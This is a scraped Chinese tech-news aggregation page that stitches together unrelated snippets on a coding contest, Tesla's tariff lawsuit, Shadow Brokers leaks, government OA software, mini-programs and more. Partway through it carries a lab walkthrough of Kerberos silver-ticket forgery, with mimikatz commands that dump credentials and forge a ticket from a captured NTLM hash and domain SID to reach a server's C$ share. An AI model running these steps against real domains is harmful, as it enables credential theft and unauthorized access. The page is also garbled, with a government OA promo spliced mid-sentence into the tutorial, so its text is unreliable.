第二屆“長沙銀行杯”騰訊云啟創(chuàng)新大賽 | 《數(shù)字英雄》第二季即將開播!:9月,騰訊云、長沙銀行推出“長沙銀行杯”騰訊云啟創(chuàng)新大賽,聯(lián)合湖南電視臺推出全國首檔真人秀程序員編程團隊競技節(jié)目--《數(shù)字英雄》,基于社會熱點的真實場景,結(jié)合wecity技術(shù)能力生態(tài)和長沙銀行的金融服務(wù)能力
近年來,湖南數(shù)字產(chǎn)業(yè)已經(jīng)邁入發(fā)展快車道、在全產(chǎn)業(yè)鏈實現(xiàn)深度鏈接,特別是在湖南省委省政府大力實施“三高四新”政策背景下,在連續(xù)舉辦八屆岳麓峰會的長沙,數(shù)字人才、數(shù)字產(chǎn)業(yè)、數(shù)字經(jīng)濟正以前所未有的態(tài)勢急速前進
在本次晉級團隊中還有幾只特別的團隊,選題為鄉(xiāng)村數(shù)字化治理協(xié)同共治平臺的黑貓警長隊是一支深耕公益領(lǐng)域的團隊,領(lǐng)隊還是民間救援隊成員,有多次抗災(zāi)救災(zāi)經(jīng)歷;選題為面向電力行業(yè)的數(shù)據(jù)價值融通服務(wù)平臺的兆物信鏈隊的三位核心隊員皆為退伍軍人
3.jpg4.jpg 3、數(shù)字課題與競技選題相匹配、物質(zhì)獎勵與企業(yè)采購相對接: 本次大賽課題設(shè)置兩大方向、五大賽道,分別是智慧城市和鄉(xiāng)村振興兩大課題方向,商貿(mào)、美食、醫(yī)療、園區(qū)、文教五大行業(yè)賽道。
如涉及智慧城市的智慧養(yǎng)老機構(gòu)管理解決方案、劇本殺行業(yè)數(shù)字化創(chuàng)新服務(wù)方案、冷鏈供應(yīng)鏈管理服務(wù)平臺等;涉及鄉(xiāng)村振興的鄉(xiāng)村數(shù)字化治理協(xié)同共治平臺、智慧農(nóng)貨推動鄉(xiāng)村振興等。
特斯拉起訴美國政府!要求取消對華關(guān)稅,稱中國進口零部件關(guān)鍵且不可替代:大數(shù)據(jù)文摘出品來源:theguardian、cnbc編譯:牛婉楊、魏子敏特斯拉把美國政府給告了。
沒錯,據(jù)《衛(wèi)報》報道,特斯拉對特朗普政府提起訴訟,希望喊停特斯拉對從中國進口的某些零部件征收的“非法”關(guān)稅。
羅伯特?萊特希澤(左)與特朗普(右)特斯拉:要求將關(guān)稅“連本帶息”歸還根據(jù)申請文件,特斯拉希望取消這些關(guān)稅,并對已經(jīng)繳納的關(guān)稅“退還本金并返還利息”。
除了特斯拉,奔馳也在訴訟文件中指控特朗普政府,“發(fā)起了一場史無前例、無邊界、無限制的貿(mào)易戰(zhàn),影響了逾5000億美元從中國的進口”。
特斯拉表示,受影響的部分是其自動駕駛系統(tǒng)的“大腦”。特斯拉在其豁免請求中寫道:“提高這一特定部件的關(guān)稅,會增加成本并影響盈利能力,從而對特斯拉造成經(jīng)濟損害?!?br>
錢塘峰會|工業(yè)知識圖譜“錢塘工業(yè)百科”正式發(fā)布:4月26日,2018第三屆中國工業(yè)大數(shù)據(jù)大會·錢塘峰會在杭州國際博覽中心舉辦。
本次峰會由工信部、浙江省人民政府指導(dǎo),中國信息通信研究院、中國互聯(lián)網(wǎng)產(chǎn)業(yè)聯(lián)盟、浙江省經(jīng)濟和信息化委員會、蕭山區(qū)人民政府聯(lián)合主辦。
錢塘工業(yè)百科是由杭州錢塘大數(shù)據(jù)交易中心有限公司借助全球領(lǐng)先的中文認知(語義識別)專利技術(shù)——中文認知矩陣和動態(tài)平衡模型計算技術(shù),自主開發(fā)的覆蓋工業(yè)全產(chǎn)業(yè)鏈的百科全書。
錢塘工業(yè)百科四大構(gòu)成模塊錢塘工業(yè)百科有著極強的行業(yè)性和專業(yè)性。用戶精準度高,單個用戶價值大,在分眾市場和網(wǎng)絡(luò)規(guī)模效應(yīng)方面有著巨大潛力。
,標志著錢塘數(shù)據(jù)完成了“錢塘大數(shù)據(jù)交易平臺”、“工業(yè)新媒體平臺錢塘號”、“工業(yè)大數(shù)據(jù)應(yīng)用解決方案”、“錢塘工業(yè)百科”的產(chǎn)品矩陣部署。
下一個“永恒之藍”6月見?shadow brokers組織宣布將公開更多0day漏洞!:shadow brokers稱,會員會收到的泄露信息會包括:針對瀏覽器、路由器和智能手機的exp針對操作系統(tǒng)的exp,包括windows 10操作系統(tǒng)從銀行和使用swift金融信息系統(tǒng)的機構(gòu)泄露的數(shù)據(jù)從俄羅斯
已泄露的“武器庫”中,也可能出現(xiàn)下一個“永恒之藍” 事實上,即便不出售新漏洞,shadow brokers之前泄露的文件仍可能對網(wǎng)絡(luò)造成重大影響,除了此次wannacry攻擊事件中利用到的永恒之藍(eternalblue
),還有大量nsa的漏洞需要警惕,謹防成為下一個“永恒之藍”:shadow brokers調(diào)侃抨擊美國政府及科技公司聲明中還談到了一些其他情況,比如對于最近廣泛猜測的,wannacry疑似朝鮮黑客組織lazarus
除此之外,shadowbrokers還指責(zé)了美國政府和科技公司,比如指責(zé)微軟沒有及時修復(fù)漏洞。
shadowbrokers稱,美國政府向科技公司支付費用讓他們不要修復(fù)產(chǎn)品中的0day漏洞,并在微軟等科技企業(yè)中安插了間諜。
新蔡縣政務(wù)政務(wù)OA系統(tǒng):那曲政府機關(guān)oa中域滲透 | 白銀票據(jù)利用同辦公、智能化管理等目標,極大地提升了工作效率和協(xié)作效果。首先,辦公系統(tǒng)軟件oa實現(xiàn)了信息的集中管理和共享。在傳統(tǒng)的辦公環(huán)境中,員工可能需要通過傳真、郵件或者紙質(zhì)文件來傳遞信息,造成信息的分散和孤立。而
政務(wù)OA系統(tǒng)能夠?qū)⒏鞣N信息集中管理在一個平臺上,并通過權(quán)限設(shè)置實現(xiàn)信息的共享和傳遞,使得
公文系統(tǒng)程更加清晰和高效。其次,
政務(wù)OA系統(tǒng)提供了便捷的辦公工具和功能。比如公文管理、日程安排、會議管理、通訊錄等功能,讓員工能夠在一個系統(tǒng)中完成多種辦公任務(wù),避免了頻繁切換不同軟件的繁瑣,提高了工作效率。同時,
政務(wù)OA系統(tǒng)還可以根據(jù)企業(yè)的實際需求進行定制開發(fā),進一步滿足不同行業(yè)的特殊需求。另外,辦公系統(tǒng)軟件oa還支持智能化的
公文系統(tǒng)程管理。通過設(shè)定
公文系統(tǒng)程和審批流程,實現(xiàn)自動化的任務(wù)分配和協(xié)同辦公,提高了
公文系統(tǒng)程的透明度目錄
0x01 介紹
0x02 白銀票據(jù)利用
0x01 介紹
之前,我們已經(jīng)詳細說過kerberos認證的流程,這次我們就來說說如何對其進行利用,這次主要說的是白銀票據(jù)偽造(silver tickets)
白銀票據(jù)偽造利用的是kerberos認證中的第三個步驟,在第三步的時候,client會帶著ticket向server的某個服務(wù)進行請求,如果驗證通過就可以訪問server上的指定服務(wù)了,這里ticket的格式是這樣的:
代碼語言:javascript
復(fù)制
server hash(server session key + client info + end time)
其中client info我們是很清楚的,end time也可以根據(jù)自己當前的時間進行偽造,server session key是tgs生成的,在未向server發(fā)送ticket的時候,server也是不知道server session key是什么的,所以只要我們知道server hash就可以去訪問server中的指定服務(wù)了。
其實與其說這是一種利用方式,倒不如說這是一個后門,在擁有server hash的時候,可以隨時去請求server。
根據(jù)上面的攻擊流程總結(jié)以下白銀票據(jù)的攻擊特點:
1.不需要與kdc進行交互
2.需要server的ntlm hash
0x02 白銀票據(jù)利用
代碼語言:javascript
復(fù)制
dc 192.168.6.112
client 192.168.6.113win7-client.zhujian.com
server 192.168.6.114win7-server.zhujian.com
這里我們使用文件共享的方式來進行驗證
輸入\win7-server.zhujian.com\c$進行驗證
發(fā)現(xiàn)需要輸入密碼才能進行連接
然后我們使用mimikatz去server中導(dǎo)出hash
代碼語言:javascript
復(fù)制
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt
可以發(fā)現(xiàn)已經(jīng)獲取到了hash等各種信息
然后回到client中使用mimikatz來偽造票據(jù)
命令如下
代碼語言:javascript
復(fù)制
mimikatz "kerberos::golden /domain:<域名> /sid:<域 sid> /target:<目標服務(wù)器主機名> /service:<服務(wù)類型> /rc4:<ntlmhash> /user:<用戶名> /ptt" exit
其中的信息可以這樣獲得
sid不需要填最后的 -500
注:這里的目標服務(wù)器主機名不能用這里hostname的內(nèi)容,而是要寫全稱
服務(wù)類型可以從以下內(nèi)容中來進行選擇,因為我們沒有tgt去不斷申請ticket,所以只能針對某一些服務(wù)來進行偽造
其中的用戶名可以隨便寫,這個是不受影響的,因為在數(shù)據(jù)傳過去之前server是不知道用戶名的,對于傳輸流程還不太熟悉的,可以移步《windows認證 | 域認證》
所以最后得到的信息是這樣的
代碼語言:javascript
復(fù)制
mimikatz.exe "kerberos::golden /domain:zhujian.com /sid:s-1-5-21-829259175-2571685386-1296789624 /target: win7-server.zhujian.com /service:cifs /rc4:e467173f3c80e9f23084396625486f60 /user: secquan /ptt" exit
然后再一次進行測試
已經(jīng)可以成功訪問了
如果對windows認證有興趣的可以看一下下面的幾篇文章來學(xué)習(xí)一下《windows認證 | windows本地認證》、《windows認證 | 網(wǎng)絡(luò)認證》、《windows認證 | 域認證》、《spn掃描》、《kerberoasting攻擊》
推薦閱讀
離線破解navicat密碼
php-fpm在nginx特定環(huán)境下的任意代碼執(zhí)行漏洞(cve-2019-11043)
linux權(quán)限詳解
linux文件查找命令詳解
linux重定向及反彈shell詳解
如果對你有幫助,請點擊在看或者轉(zhuǎn)發(fā)
都是對我的一種支持
2017年信息消費將達900億 云計算帶動產(chǎn)值超1000億:近日,東莞市政府印發(fā)了《促進信息消費實施方案(2015—2017 年)》(下稱《方案》)?!斗桨浮诽岢?,到2017年,全市信息消費總額要達到900億元,年均增長20%以上。
在物聯(lián)網(wǎng)應(yīng)用消費上,東莞將推動智慧城管、智慧醫(yī)療、智慧商務(wù)、智慧環(huán)保、智慧交通等物聯(lián)網(wǎng)示范應(yīng)用建設(shè),深入開展石龍、東城、松山湖、虎門港等智慧東莞試點區(qū)域建設(shè)。
■延伸閱讀東莞信息消費空間有多大?1993年,美國政府提出“國家信息基礎(chǔ)設(shè)施”工程計劃,被通俗的稱為“信息高速公路”。
在今年1月19日的東莞市政府常務(wù)會議上,市長袁寶成表示,信息消費對第三產(chǎn)業(yè)尤其是生產(chǎn)性服務(wù)業(yè)具有重要的引導(dǎo)、帶動和提升作用,不是簡單的傳統(tǒng)的消費概念。
他說,東莞的信息產(chǎn)值位列全國第七,要進一步鞏固地位。信息服務(wù)帶來的變革,將從根本上改變東莞的產(chǎn)業(yè)結(jié)構(gòu),要爭取讓信息服務(wù)產(chǎn)業(yè)成為東莞產(chǎn)業(yè)轉(zhuǎn)型升級的一個龍頭。
軟件文檔總結(jié):首先說一下軟件工程,軟件工程標準的制定有一個生命周期,從發(fā)起建議到發(fā)布和維護大致如如下:
?
制定的過程中,按照這個環(huán)狀生命周期會循環(huán)數(shù)次,不斷地進行修改和改正,變得逐漸成熟。
在軟件開發(fā)之前,有一項非常重要的工作,就是寫軟件文檔,軟件文檔從形式上看的話,大致分為兩類:一類是工作表格,就是開發(fā)過程中填寫的各種表格;第二類就是編制的技術(shù)資料或者管理技術(shù)資料。
要是從文檔的生產(chǎn)和使用范圍來分則分為三類:
?
寫好軟件文檔,一份好的文檔相當于一份精美的介紹或者使用手冊,讓相關(guān)的工作人員充分的了解新的軟件,從而做出更好地軟件。
小程序憑什么受到那么多人的青睞,它的發(fā)展前景究竟如何:b: 小程序與線下的連接能力在強化,特別在巨頭都在推廣“新零售”概念的大背景下,小程序是這類生態(tài)的核心入口:連接線下零售商超的“萬達廣場”、“yh永輝生活+”,連接線下公共交通的“車來了精準的實時公交”
c: 政務(wù)類小程序首次上榜。譬如,“粵省事”小程序是廣東省政務(wù)民生服務(wù)的集合入口,通過身份認證進行統(tǒng)一管理,為用戶提供一站式民生服務(wù)。
?
?
這是微信官方投放小程序廣告
小程序能爆發(fā)的必然性:
從發(fā)展的角度: 坐公交地鐵,打開小程序掃碼就能付款乘車;去飯店吃飯,在路上就可以用小程序點單,到店直接就餐;去逛商場,一掃小程序碼,商場店鋪布局就出現(xiàn)在手機上
為什么技術(shù)團隊領(lǐng)導(dǎo)者多是后臺開發(fā)人員:回到題目,我認為還是后臺開發(fā)人員居多,為什么,簡單看看各個崗位的職能來拆解下原因。
雖然有pm驅(qū)動產(chǎn)品開發(fā)的說法,但往往領(lǐng)導(dǎo)技術(shù)開發(fā)的人是個懂技術(shù)開發(fā)的,交流起來才更順暢。
ui設(shè)計?
第三種情況是前端全棧(我也不清楚為什么前端通到了存儲層,就稱自己為全棧),這種情況從前端展現(xiàn)到后臺服務(wù)都能經(jīng)歷到,承擔(dān)項目團隊管理工作,順理成章,但前面的第一種情況基本無可能。
為什么是后臺開發(fā)人員承擔(dān)項目/產(chǎn)品管理的居多?軟件開發(fā)早期,職能崗位不全時,就是后臺開發(fā)通吃,后臺開發(fā)貫穿整個產(chǎn)品周期,從需求分析階段介入,各環(huán)節(jié)的評審都有參與,一直到后期的運營維護,直至停機運行。
這樣的角色與其它角色溝通時,除了一些專業(yè)交互之外基本沒什么障礙。管理的要素之一就是要降低成本 ,提交效率。溝通成本是產(chǎn)品開發(fā)中比較隱性的大成本。
測試人員不行嗎?
轉(zhuǎn)載請注明出處,本站網(wǎng)址:
http://m.opentechcloud.com/news_2311.html